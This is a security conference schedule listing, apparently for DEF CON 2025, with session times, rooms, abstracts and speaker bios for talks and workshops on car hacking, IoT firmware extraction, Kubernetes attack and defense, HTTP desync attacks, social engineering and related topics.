Title: Hands-on Car Hacking & Automotive Cybersecurity
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

As automobiles increase their reliance on advanced connectivity and autonomy systems, they become more vulnerable to cyber-attacks. This class introduces participants to car hacking with in-depth case studies of automotive security research and guided, hands-on activities to instill mastery in the use of automotive technologies such as CAN and diagnostic protocols such as UDS and XCP. All hardware and software needed for the course is supplied by the instructor.

Participants will learn:

SpeakerBio:  Kamel Ghali

Kamel Ghali is an 8 year veteran of the automotive cybersecurity industry and the VP of international affairs of the Defcon Car Hacking Village. He has extensive cyber physical systems security experience and has worked as a vehicle penetration tester, security consultant, and trainer in the United States and Japan. He speaks fluent English, Arabic, and Japanese, and volunteers in cybersecurity communities around the world spreading awareness for the need for cybersecurity in transportation systems.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Hands-on Car Hacking & Automotive Cybersecurity
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

As automobiles increase their reliance on advanced connectivity and autonomy systems, they become more vulnerable to cyber-attacks. This class introduces participants to car hacking with in-depth case studies of automotive security research and guided, hands-on activities to instill mastery in the use of automotive technologies such as CAN and diagnostic protocols such as UDS and XCP. All hardware and software needed for the course is supplied by the instructor.

Participants will learn:

SpeakerBio:  Kamel Ghali

Kamel Ghali is an 8 year veteran of the automotive cybersecurity industry and the VP of international affairs of the Defcon Car Hacking Village. He has extensive cyber physical systems security experience and has worked as a vehicle penetration tester, security consultant, and trainer in the United States and Japan. He speaks fluent English, Arabic, and Japanese, and volunteers in cybersecurity communities around the world spreading awareness for the need for cybersecurity in transportation systems.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: Hands-on IoT firmware extraction and flash forensics
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N258 - Map

Description:

Did you ever wanted to hack an IoT device but did not know how to start? Having UART is nice, but does not help in many cases.

For a complete analysis of an IoT device, it is required to look at the firmware itself. In most cases this means that the firmware, data or encryption keys need to be extracted from the device memory. Many researchers are hesitant to do that as there is a high risk of destroying the device or leaving it in an inoperable state. In this workshop we will look at different flash memory types (EEPROM, SPI flash, NAND flash, eMMC flash) and how to extract the information from them.

We will show that you do not need very expensive hardware to archive your goal and that it is not as complicated as everyone believes. See which tools might be useful for your own lab!

Participants will have the opportunity to work in groups and being provided different kinds of IoT devices (e.g. smart speakers). After a tear-down, you can use different chip-off methods (e.g. Hot air, IR soldering) to remove the flash chip and read it out. Optionally, the tools re-ball and re-solder the IC will be available after the workshop. In the end, each team should have the data and a functional device again.

Bonus: If you brick the device, you can keep the parts as a souvenir or can wear them as badges.

Speakers:Dennis Giese,Braelynn Luedtke

SpeakerBio:  Dennis Giese, IoT Security&Privacy researcher

Dennis Giese is a researcher with the focus on the security and privacy of IoT devices. While being interested in physical security and lockpicking, he enjoys applied research and reverse engineering malware and all kinds of devices. His most known projects are the documentation and hacking of various vacuum robots. He calls himself a "robot collector" and his current vacuum robot army consists of over 80 different models from various vendors. He talked about his research at the Chaos Communication Congress, REcon, HITCON, NULLCON, and DEFCON.

SpeakerBio:  Braelynn Luedtke, Security Researcher

Braelynn is a security consultant at Leviathan Security Group where she conducts security assessments of products for startups, Fortune 500 companies, and everything in between. She enjoys partaking in CTFs and researching the security anything that piques her curiosity. She has previously presented this research at conferences such as Chaos Communication Congress, HITCON and DEFCON.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: Hands-on Kubernetes Attack & Defense Masterclass
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N255 - Map

Description:

Kubernetes has transformed how we deploy applications, but its complexity has created a new attack surface actively exploited by threats. This workshop delivers practical experience exploiting and defending against dangerous misconfigurations found in production environments.

Based on extensive research and the popular Kubernetes Goat platform, you'll work through realistic attack scenarios including privilege escalation, container escapes, lateral movement, and persistence techniques. For each vulnerability exploited, you'll implement corresponding defenses using Kubernetes-native controls.

Our pre-configured environment with vulnerable applications lets you focus on mastering both offensive and defensive techniques. You'll gain:

Whether securing Kubernetes or adding cloud-native exploitation to your skillset, this workshop delivers actionable knowledge through guided practice rather than abstract concepts.

SpeakerBio:  Madhu "madhuakula" Akula, Pragmatic Security Leader

Madhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.

Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.

His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 09:00-12:59 PDT


Title: Hands-On Threat Hunting with Wireshark
When: Saturday, Aug 9, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N253 - Map

Description:

What threats are hidden in network traffic? In this hands-on course, we’ll show you how to spot malicious activity hiding in plain sight. Learn how to filter noise, detect C2 traffic, and uncover stealthy attacks using real-world packet captures. Whether you're into blue teaming, incident response, or just love dissecting packets, this session will sharpen your network forensics skills!

SpeakerBio:  Chris Greer, Packet Analyst

Chris is a Packet Analyst at Packet Pioneer, specializing in network performance analysis and forensics using Wireshark. Whether he's investigating complex issues at the packet level or leading hands-on training sessions, Chris is passionate about helping others master the art of packet analysis.

As a certified instructor and active contributor to the Wireshark Foundation, he regularly teaches interactive Wireshark courses for audiences of all sizes. Chris also shares bite-sized tips, analysis techniques, and troubleshooting strategies on his YouTube channel—making network forensics more accessible to analysts at every level.


Return to Index    -    Add to Google    -    ics Calendar file

- Friday - 13:15-13:59 PDT


Title: Hard Hat Brigade Creations Q&A
When: Friday, Aug 8, 13:15 - 13:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

HHB goes over hard hats, construction, and all the hackery things people have done with them

Speakers:MrBill,M0nkeyDrag0n,Hydrox,CoD_Segfault

SpeakerBio:  MrBill, Founder at Hard Hat Brigade
No BIO available
SpeakerBio:  M0nkeyDrag0n, Organizer at Hard Hat Brigade
No BIO available
SpeakerBio:  Hydrox, Organizer at Hard Hat Brigade
No BIO available
SpeakerBio:  CoD_Segfault, Organizer at Hard Hat Brigade
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

- Saturday - 15:00-15:45 PDT


Title: Hard Hat Brigade Organizer Panel
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Origins of Hard Hat Brigade (why), the who / what / how

Speakers:MrBill,M0nkeyDrag0n,Hydrox,CoD_Segfault

SpeakerBio:  MrBill, Founder at Hard Hat Brigade
No BIO available
SpeakerBio:  M0nkeyDrag0n, Organizer at Hard Hat Brigade
No BIO available
SpeakerBio:  Hydrox, Organizer at Hard Hat Brigade
No BIO available
SpeakerBio:  CoD_Segfault, Organizer at Hard Hat Brigade
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Harnessing LLMs for Application Security
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This comprehensive course is designed for developers and cybersecurity professionals seeking to harness the power of Generative AI and Large Language Models (LLMs) to enhance software security and development practices. Participants will gain a deep understanding of LLM functionality, strengths, and weaknesses, and learn to craft effective prompts for diverse use cases. The curriculum covers essential topics such as embeddings, vector stores, and Langchain, offering insights into document loading, code analysis, and custom tool creation using Agent Executors.

Course highlights:

Speakers:Seth Law,Ken Johnson

SpeakerBio:  Seth Law, Founder & Principal at Redpoint Security

Seth utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.

SpeakerBio:  Ken Johnson, Co-Founder and CTO at DryRun Security

Ken utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Harnessing LLMs for Application Security
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This comprehensive course is designed for developers and cybersecurity professionals seeking to harness the power of Generative AI and Large Language Models (LLMs) to enhance software security and development practices. Participants will gain a deep understanding of LLM functionality, strengths, and weaknesses, and learn to craft effective prompts for diverse use cases. The curriculum covers essential topics such as embeddings, vector stores, and Langchain, offering insights into document loading, code analysis, and custom tool creation using Agent Executors.

Course highlights:

Speakers:Seth Law,Ken Johnson

SpeakerBio:  Seth Law, Founder & Principal at Redpoint Security

Seth utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.

SpeakerBio:  Ken Johnson, Co-Founder and CTO at DryRun Security

Ken utilizes LLMs heavily in his work and has a wealth of real world applicable skills to share in applying LLMs to the application security domain.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 12:00-12:45 PDT


Title: Have I Been Ransomed?
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

Have I Been Ransomed? is a specialized security service, akin to Have I Been Pwned, designed to detect personal data exposure specifically from ransomware leaks. As ransomware attacks increasingly involve data theft and public dumping, individuals need a way to check if their personally identifiable information has been compromised. Our platform goes beyond standard database checks by processing a wide array of leaked file types, including PDFs, documents, and text files. We employ advanced optical character recognition coupled with sophisticated large language models to meticulously scan unstructured data and extract sensitive identifiers such as national ID cards, driver’s licenses, and social security numbers. Have I Been Ransomed? provides critical awareness, empowering users to discover if their sensitive information has been exposed in a ransomware incident and enabling them to take proactive steps against potential identity theft and fraud.

SpeakerBio:  Juanma "M4C" Tejada

Juanma is a telecommunications engineer with a profound passion for drone technology and the complexities of hacking. His journey into the cybersecurity realm began unconventionally. Initial explorations through various online forums, driven by early curiosities, unexpectedly ignited a deep interest in the mechanics of data leaks, system breaches, and the evolving tactics of ransomware groups. This non-traditional path provided firsthand exposure to the cyber underground, equipping him with practical, real-world insights into attacker motivations and methodologies. This unique background grants him a grounded perspective, making him well-qualified to discuss the practical applications and implications within the current cybersecurity landscape.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 13:00-13:45 PDT


Title: Have I Been Ransomed?
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Have I Been Ransomed? is a specialized security service, akin to Have I Been Pwned, designed to detect personal data exposure specifically from ransomware leaks. As ransomware attacks increasingly involve data theft and public dumping, individuals need a way to check if their personally identifiable information has been compromised. Our platform goes beyond standard database checks by processing a wide array of leaked file types, including PDFs, documents, and text files. We employ advanced optical character recognition coupled with sophisticated large language models to meticulously scan unstructured data and extract sensitive identifiers such as national ID cards, driver’s licenses, and social security numbers. Have I Been Ransomed? provides critical awareness, empowering users to discover if their sensitive information has been exposed in a ransomware incident and enabling them to take proactive steps against potential identity theft and fraud.

SpeakerBio:  Juanma "M4C" Tejada

Juanma is a telecommunications engineer with a profound passion for drone technology and the complexities of hacking. His journey into the cybersecurity realm began unconventionally. Initial explorations through various online forums, driven by early curiosities, unexpectedly ignited a deep interest in the mechanics of data leaks, system breaches, and the evolving tactics of ransomware groups. This non-traditional path provided firsthand exposure to the cyber underground, equipping him with practical, real-world insights into attacker motivations and methodologies. This unique background grants him a grounded perspective, making him well-qualified to discuss the practical applications and implications within the current cybersecurity landscape.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 12:00-12:45 PDT


Title: Help! Linux in my Webcam! (•_•)
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

In this talk, we dive into a world of webcams that secretly run Linux. What started as a casual curiosity turned into a deep dive into embedded Linux systems, obscure supply chains, and alarming security oversights.

Along the way, we discovered how decisions made far upstream – by silicon vendors and OEMs – can introduce vulnerabilities that quietly ship in tens of thousands of devices.

This presentation explores the broader implications of insecure firmware, broken update mechanisms, and the surprising autonomy of devices many assume to be simple peripherals.

We share how we traced the tech stack from brand-name distributors back to little-known chipset manufacturers, and what that journey revealed about responsibility, transparency, and the risks of neglecting security at the hardware-software boundary.

Come for curiosity, stay for the demos and laughs.

Speakers:Mickey Shkatov,Jesse Michael

SpeakerBio:  Mickey Shkatov

Mickey has been involved in security research for over a decade, specializing in breaking down complex concepts and identifying security vulnerabilities in unusual places. His experience spans a variety of topics, which he has presented at security conferences worldwide. His talks have covered areas ranging from web penetration testing to the intricacies of BIOS firmware.

SpeakerBio:  Jesse Michael

Jesse is an experienced security researcher focused on vulnerability detection and mitigation who has worked at all layers of modern computing environments from exploiting worldwide corporate network infrastructure down to hunting vulnerabilities inside processors at the hardware design level. His primary areas of expertise include reverse engineering embedded firmware and exploit development. He has also presented research at DEF CON, Black Hat, PacSec, Hackito Ergo Sum, Ekoparty, and BSides Portland.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Sunday - 11:00-11:30 PDT


Title: Here and Now: Exploiting the Human Layer at the Right Moment
When: Sunday, Aug 10, 11:00 - 11:30 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Gaining access isn’t always about having the perfect pretext. Sometimes, it’s about recognizing subtle shifts in the environment, reading behavioral cues, and adapting on the fly. The best social engineers, like master photographers, don’t just plan—they wait for the decisive moment and take action when the time is right.

This session unpacks a real-world infiltration where success wasn’t about meticulous scripting, but about understanding when and how to pivot in real time. By integrating principles from photography, literature, theater, and deception, we explore how presence, timing, and perception shape the art of infiltration.

SpeakerBio:  Daniel Isler, Awareness & Social Engineering Consultant - Team Leader - Dreamlab Technologies

Bachelor in Arts of Representation. With certifications in Social Engineering, Red Team & OSINT. Team Leader of Fr1endly RATs, the Social Engineering unit at Dreamlab Technologies Chile. Specializing and developing techniques and methodologies for simulations of Phishing attacks, Vishing, Pretexting, Physical Intrusions and Red Team.


Return to Index    -    Add to Google    -    ics Calendar file

BHV - Friday - 17:30-17:59 PDT


Title: How AI + Hardware can Transforming Point-of-Care Workflows
When: Friday, Aug 8, 17:30 - 17:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

The Bio / medical industry creates huge amounts of data—vital-sign streams, imaging, clinician notes— Knowledge base requirements are very heavy, so a little help from a specialized llm can boost the productivity alot. Our new layered technology, accomplishes just this

Hardware layer: A customized CM5 board, an RP2040 co-processor, and a sunlight-readable E-ink display strike the sweet spot LLM entirely on-device + many other transcription models + TTS models.

Software layer – Our “MCP Hub” turns plain-language requests like “track heart rate every five minutes” into a reliable data log, even when Wi-Fi is down. With the help of AI coding, any sensor can start to work within 5min.

SpeakerBio:  PamirAI

Kevin & Tianqi are veteran engineers from Microsoft Surface devices and Qualcomm’s efficient-AI—that is miniaturizing enterprise-grade inference into badge-sized hardware, they designed the hardware + software of distiller, and enclosure to squeeze 3-billion-parameter language models into a 10-Watt, pocket-safe form factor, giving clinicians instant, private access to AI reasoning right at the bedside.


Return to Index    -    Add to Google    -    ics Calendar file

CHV - Friday - 12:30-12:59 PDT


Title: How API flaws led to admin access to over 1,000 USA dealers and control over your car
When: Friday, Aug 8, 12:30 - 12:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Many automotive dealers in the USA utilize centralized platforms for everything from sales to service to marketing. The interconnectivity of various systems makes things easy to manage, but also exposes certain risks should any of these systems have a vulnerability. API flaws were discovered in a top automaker's dealer platform that enabled the creation of a national admin account. With that level of access, being able to remotely take over your car was only the tip of the iceberg…

SpeakerBio:  Eaton Zveare, Senior Security Research Engineer at Traceable by Harness

Eaton is a senior security research engineer at Traceable by Harness. As a member of the ASPEN Labs team, he has contributed to the security of some of the world's largest organizations by finding and responsibly disclosing many critical vulnerabilities. He is best known for his high-profile security disclosures in the automotive space: 1, 2, 3.


Return to Index    -    Add to Google    -    ics Calendar file

MHV - Saturday - 16:30-16:59 PDT


Title: How Computers Kill People: Marine Systems
When: Saturday, Aug 9, 16:30 - 16:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

As digital systems increasingly control the world’s most powerful machines, software failures have become a silent but deadly threat—sometimes with fatal consequences. This DEFCON presentation dives deep into maritime and military incidents where software errors, automation missteps, and human-computer interface flaws have led to catastrophic outcomes. Reviewing the USS Yorktown’s infamous “Smart Ship” crash and the USS Vincennes’ tragic misidentification of a civilian airliner, we dissect how code, configuration, and design choices can escalate into life-or-death situations at sea. We’ll also draw parallels to high-profile aviation incidents like the Boeing 737 Max and F-35, illustrating common threads in software assurance failures across domains. We’ll walk through how a subtle software flaw could be exploited to disrupt critical vessel operations, and what this means for the future of maritime cybersecurity. Attendees will gain insight into the technical, organizational, and ethical challenges of securing mission-critical systems, and leave with practical takeaways for hackers, engineers, and policymakers seeking to prevent the next digital disaster on the high seas.

Speakers:Michael DeVolld,Austin Reid

SpeakerBio:  Michael DeVolld, ABS Group

With 25 years of experience in the maritime sector, Michael is dedicated to ensuring the safety and security of the global Maritime Transportation System (MTS). A retired US Coast Guard Officer, he has conducted numerous safety and compliance inspections, investigated high-profile marine casualties, and established a cybersecurity program at USCG Cyber Command. Previously, as a Business Information Security Officer for Royal Caribbean Group, Michael developed strategies to maintain the cybersecurity and regulatory compliance of the company's global cruise fleet. Holding a B.S. in Computer Science and an M.S. in Telecommunications, he currently serves as ABS Consulting's Maritime Cybersecurity Director. In this role, he specializes in managing cyber risks, implementing technical solutions, shaping policy and governance, providing expert advisory services, and designing custom solutions to meet maritime regulatory requirements and best practices.

SpeakerBio:  Austin Reid, ABS Group

Austin Reid is a senior consultant at ABS Consulting specializing in securing maritime operational technology with 10 years experience in the Maritime sector from breakbulk, automated container terminal ops, and securing critical vessel systems for all types of ships. He is also a hacker, and security researcher specializing in maritime navigation control systems.


Return to Index    -    Add to Google    -    ics Calendar file

ESV - Saturday - 10:00-10:59 PDT


Title: How Not to IoT: Lessons in Security Failures
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

Welcome to the “fun” world of IoT, where security is often an afterthought and vulnerabilities lurk around every corner. This presentation is a guide for vendors on what not to do when designing IoT devices and a survival manual for users to spot insecure gadgets. Ever wondered if your IoT device is spilling your home WiFi secrets to the cloud over HTTP? Spoiler alert: maybe :) Pairing your device over open WiFi and HTTP while providing your home WiFi credentials? Just to vacuum clean your home?
How about IoT devices lying about their Android version? But don’t worry, it already comes with malware pre-infected. Wouldn’t it be nice to access the clear-text admin passwords before authentication? How about multiple different ways to do that? Would you like to see reverse engineering an N-day command injection vulnerability in the login form of a popular NAS device? What could be the easiest way to figure out the (static) AES encryption key for a home security alarm solution? Just RTFM! Why bother with memory corruption when command injection is still the king of IoT threats? I'll break it down for you, with an analysis of challenges with scalable IoT memory corruption exploits, and the challenges with blind ROP. Last but not least, let’s discuss why Busybox is “not the best” choice for IoT development.

SpeakerBio:  Zoltan "zh4ck" Balazs, Principal Vulnerability Researcher at CUJO AI

Zoltan (@zh4ck) is a Principal Vulnerability Researcher at CUJO AI, a company focusing on smart home security. Previously he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes, and is partially “responsible” for an IoT botnet infecting 600K devices.

I am a big fan of offsec certs, currently holding OSEP, OSED, OSCE, OSCP, and OSWP.


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Saturday - 12:00-12:59 PDT


Title: How NOT to Perform Covert Entry Assessments by WeHackPeople.com
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

"How NOT to Perform a Covert Entry Assessment" is a no B.S. discussion that covers what not to do during covert entry engagements--highlighting real-world mistakes, busted Hollywood myths, and missteps that compromise success. We’ll walk through effective techniques for physical site surveys, face-to-face social engineering, and real-time troubleshooting when things go sideways. Attendees will be encouraged to share experiences and lessons learned in an open, interactive format. We’ll also demo our covert entry tools, and discuss how to deliver reliable results to both commercial and high-security government clients.

Speakers:Brent White,Tim Roberts

SpeakerBio:  Brent White, WeHackPeople.com / Dark Wolf Solutions

Brent is a Sr. Principal Security Consultant / Covert Entry Specialist with Dark Wolf Solutions, specializing in social engineering and Red Team-style security assessments for both commercial and Department of Defense clients, as well as his contributions towards the development the drone hacking methodology for the Defense Innovation Unit's "Blue sUAS" initiative. He also served as a trusted adviser for the TN Dept of Safety and Homeland Security on the topic of physical and cyber security and has held the role of Web/Project Manager and IT Security Director for a global franchise company as well as Web Manager and information security positions for multiple TV personalities.

He has also been interviewed on the popular web series, “Hak5” with Darren Kitchen, Security Weekly, BBC News, featured with Tim Roberts on the popular series "ProfilingEvil" by Mike King, and on Microsoft’s “Roadtrip Nation” television series. His experience includes Internal/External Penetration, Network evasion, Wireless, Web Application, Drone and Physical Security assessments, and Social Engineering.

Brent has also spoken at numerous security conferences, including ISSA International, DEF CON, Black Hat, DerbyCon, multiple "B-Sides" conference events, Appalachian Institute of Digital Evidence conference at Marshall University, and many more.

SpeakerBio:  Tim Roberts, WeHackPeople.com / Dark Wolf Solutions

Tim is a Covert Entry Specialist with Dark Wolf Solutions and Sr. Principal Penetration Tester. He is the founding member of the Lexington DEF CON group (DC859). He has been interviewed on the subject of “White hat hacking” for Microsoft’s “Roadtrip Nation” television series, was featured on IDG Enterprise’s CSO Online publication by Ryan Francis on social engineering, and was interviewed at Black Hat by HelpNetSecurity on security awareness and “Know Your Adversary”. He and Brent White have also been featured a couple of times on the true crime series Profiling Evil with Mike King.

Tim has over fifteen years of professional security experience and has held management, IT, and physical security roles across multiple industries, including healthcare, finance, and government. His experience includes Red Team, Internal/External Network, Wireless, Application, Physical Security, Social Engineering, and more.

Tim has spoken and conducted training at numerous security and hacker conferences, including ISSA International, DEF CON, DerbyCon, NolaCon, various B-Sides, CircleCityCon, Techno Security Con, SaintCon, Appalachian Institute of Digital Evidence at Marshall University, Who’s Your Hacker, was keynote for the S&H Law – FBI/Hacker Panel, and more. By continuing to share these experiences, he hopes to further contribute to the InfoSec community and security awareness as a whole.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 14:00-14:20 PDT


Title: How to Fake a Badge like a Pro: 11 Tips to Counterfeiting Event Credentials
When: Sunday, Aug 10, 14:00 - 14:20 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Anticounterfeiting is an obscure and private world. Companies tightly hold their secrets and rely heavily on security through obscurity. But banknotes and government IDs aren’t the only targets of counterfeiting. Live events are increasingly targeted as ticket prices increase. The fast moving and dynamic nature of live events makes both counterfeiting and anticounterfeiting a more complex challenge. The limited time before the event ends is a key defense for event producers.

But with a basic mix of social engineering, arts and crafts, and keen observation most of these credentials can be defeated using DIY techniques. Even advanced measures like UV ink or holograms can be defeated or avoided with techniques you might have learned in art class. But while copying a credential seems easy enough, there are numerous mistakes that would-be counterfeiters make.

This talk will reveal 11 beginner mistakes to credential copying and how to avoid them. With physical examples of real historical credentials from NASA, NATO, the US Navy, the NFL, and more, this talk will leave you ready to fake a badge like a pro.

References:

SpeakerBio:  Russell Phillips

With over two decades of experience in the event and information security industries, Russell Phillips is a leader in event access control. Russell coordinates all aspects of event access control technology and leads the Information Security team at SXSW, and has been instrumental to the operational success of one of the largest cultural events in the world. His in depth field experience in the myriad hardware, software, and human complications provides him with nuanced insights into turning policy into practice. Running among the world’s largest mobile event access control deployment provides the perfect testing ground to hone training, implementation, and incident response.

A lifelong proponent of the hacker ethos, Russell remains fascinated with all technology weird and wonderful. Mesh SDR networks and at-home pulse dialing telephony are current personal project areas.

Russell is a Certified Information Security Systems Professional and a member of Telephone Collectors International.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 11:00-11:45 PDT


Title: How to secure unique ecosystem shipping 1 billion+ cores?
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Security research has been focused on securing well-known, widely replicated ecosystems where problems and solutions are shared across the industry. But what happens when you build something no one else has? How do you secure an architecture that's both proprietary and deployed at billion-core scale?

In 2016, NVIDIA began transitioning its internal Falcon microprocessor, used in nearly all GPU products, to a RISC-V based architecture. Today, each chipset has 10-40 cores, and in 2024, NVIDIA surpassed 1 billion RISC-V cores shipped. This success came with unique security challenges, ones that existing models couldn't solve.

To address them, we created a custom SW and HW security architecture from scratch. Including a purpose-built Separation Kernel SW, novel RISC-V ISA extensions like Pointer Masking, IOPMP (later ratified), and unique secure boot and attestation solution. But how do you future-proof a proprietary ecosystem against tomorrow's threats?

In this talk, we'll share what we learned, and what's next. From HW-assisted memory safety (HWASAN, MTE) to control-flow integrity (CFI) and CHERI-like models, we'll explore how NVIDIA is preparing not only its RISC-V ecosystem for the evolving threat landscape. If you care about real-world security at an unprecedented scale, this is a journey you won't want to miss.

References:

Speakers:Adam "pi3" Zabrocki,Marko Mitic

SpeakerBio:  Adam "pi3" Zabrocki

Adam ‘pi3’ Zabrocki is a Director of Offensive Security at NVIDIA and specializes in low-level security research. He created Linux Kernel Runtime Guard (LKRG) project defended by Openwall and has worked in Microsoft, European Organization for Nuclear Research (CERN), HISPASEC Sistemas (virustotal.com), Wroclaw Center for Networking and Supercomputing, Cigital and more. Adam has contributed to numerous projects, found vulnerabilities in various systems (including Hyper-V, KVM, RISC-V ISA, Intel's Reference Code, Intel/NVIDIA vGPU, Linux kernel, FreeBSD, OpenSSH, gcc SSP/ProPolice, Apache), and published research in Phrack Magazine. He serves as Vice-Chair of the RISC-V J-extension group and has developed key security extensions for RISC-V (Pointer Masking/HWASAN, Control Flow Integrity) currently working on Memory Tagging. Coauthor of a Windows Internals and twice nominated for The Pwnie Awards, he has spoken at major security conferences like Blackhat and DEF CON, Security BSides, more

SpeakerBio:  Marko Mitic

Marko is a Software Security Architect and System Software Manager focused on secure system design and product security, currently managing NVIDIA’s Core RISC-V team. For the past 10 years at NVIDIA he worked on designing key security aspects for the core system software architecture and drove offensive security practices for GPU system software. He was Security and Risk Officer and PSIRT lead responsible for driving and tracking PSIRT issues and developing remediation plans. In the recent years, his focus was RISC-V, where he has been driving NVIDIA’s RISCV security architecture and implementation, bringing NVRISCV TEE to fruition in shipping NVIDIA products. Motivated by incident response experience, he now passionately leads the adoption of Ada/SPARK, formally verifiable programming language, as powerful tools for reducing security risks in NVIDIA’s most critical software components.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 16:30-17:15 PDT


Title: HTTP/1.1 Must Die! The Desync Endgame
When: Friday, Aug 8, 16:30 - 17:15 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Some people think the days of critical HTTP request smuggling attacks on hardened targets have passed. Unfortunately, this is an illusion propped up by wafer-thin mitigations that collapse as soon as you apply a little creativity.

In this session, I'll introduce multiple new classes of desync attack, enabling mass compromise of user credentials across hundreds of targets including tech giants, SaaS providers, and CDNs, with one unplanned collaboration yielding over $100,000 in bug bounties in two weeks.

I'll also share the research methodology and open-source toolkit that made this possible, replacing outdated probes with focused analysis that reveals each target's unique weak spots. This strategy creates an avalanche of desync research leads, yielding results ranging from entire new attack classes, down to exotic implementation flaws that dump server memory heartbleed-style. You'll witness attacks meticulously crafted from theoretical foundations alongside accidental exploits with a root cause so incomprehensible, the developers ended up even more confused than me.

You'll leave this talk equipped with everything you need to join me in the desync research endgame: the mission to kill HTTP/1.

References:

SpeakerBio:  James "albinowax" Kettle

James 'albinowax' Kettle is the Director of Research at PortSwigger, the makers of Burp Suite. He's best-known for pioneering novel web attack techniques, and publishing them at major conferences like DEF CON and Black Hat USA, at which he's presented for eight consecutive years. His most impactful research is HTTP Desync Attacks, which popularised HTTP Request Smuggling. Other popular attack techniques that can be traced back to his research include web cache poisoning, the single-packet attack, server-side template injection, and password reset poisoning.

He also loves exploring innovative tool concepts for security professionals, many of which have since become industry standard. Examples include introducing OAST via Burp Collaborator, bulk parameter discovery via Param Miner, billion-request attacks with Turbo Intruder, and human-style scanning with Backslash Powered Scanner. He's also the designer behind many of the topics and labs that make up the Web Security Academy.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Friday - 10:30-10:59 PDT


Title: Hull Integrity: Applying MOSAICS to Naval Mission Systems
When: Friday, Aug 8, 10:30 - 10:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

